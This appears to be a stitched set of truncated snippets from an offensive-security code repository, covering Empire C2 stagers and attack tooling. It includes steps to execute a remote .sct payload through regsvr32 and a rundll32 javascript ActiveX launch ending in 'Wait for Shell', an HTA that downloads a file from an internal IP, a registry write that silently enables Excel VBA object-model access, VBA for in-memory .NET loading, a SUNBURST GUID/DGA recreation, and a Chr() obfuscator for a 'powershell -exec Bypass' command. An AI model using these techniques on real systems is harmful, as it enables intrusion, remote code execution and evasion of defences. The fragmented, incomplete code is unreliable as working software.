khr0x40sh

# coding=utf-8
import datetime
import sys
import time
import threading
import traceback
import SocketServer
from dnslib import *

khr0x40sh

1. Create Empire Listener
2. Generate Stager
3. Host Stager Code At Some URL
4. Host .sct File At Some URL
5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll
6. Instanitate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() )
    -Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec();
7. Wait for Shell...

khr0x40sh

using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

khr0x40sh

<html>
  <head>
	<script>
	
//Set your settings
    var strFileURL = "http://192.168.56.103/execalc.html";
	var oTest = new ActiveXObject("wscript.shell");
	var pathTest = oTest.ExpandEnvironmentStrings("%USERPROFILE%") + "\\Downloads\\execalc.html";
	
    	var strHDLocation = pathTest;

khr0x40sh

<html>
	<head>
		<script>
			var objExcel = new ActiveXObject("Excel.Application");
			objExcel.Visible = false;
			var WshShell = new ActiveXObject("WScript.Shell");
			var Application_Version = objExcel.Version;//Auto-Detect Version
			var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
			WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
			var objWorkbook = objExcel.Workbooks.Add();

khr0x40sh

<#

	ElGamal in PowerShell
	by Casey Smith @subTee
	

The key generator works as follows:
Alice generates an efficient description of a cyclic group G of order q ,with generator g. 
Alice chooses an x randomly from 1 - (q-1)
Alice computes h = g^x.

khr0x40sh

' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb

Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr

#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&

khr0x40sh

Param($byteArray);

function print_prettystring($value)
{
    $final = ""
    for($i=0; $i -lt $value.Count; $i++)
    {
        if($value[$i] -gt 31 -and $value[$i] -lt 127)
        {
            $final += [char]$value[$i]

khr0x40sh

function Invoke-Sunburst-GUID-creator
{
<#
.Synopsis
    SUNBURST GUID CREATOR

.Description
    The script will generate the SUNBURST GUID and an example DGA prefix as would be seen on a compromised SolarWinds server.
    The SUNBURST GUID is made up of the machine's primary non local loopback network adapter's MAC address,
     the domain name of the system, and the (optional) GUID of the system in the registry.

khr0x40sh

Param([string]$string = "C:\windows\syswow64\windowspowershell\v1.0\powershell.exe -exec Bypass -nop ping 127.0.0.1"
);

$result = ""
$strA = $string.ToCharArray()
for($i = 0; $i -lt $strA.Length; $i++)
{
    $x = [byte]$strA[$i]
    $result += "Chr  (" + $x.ToString() + ") & "
}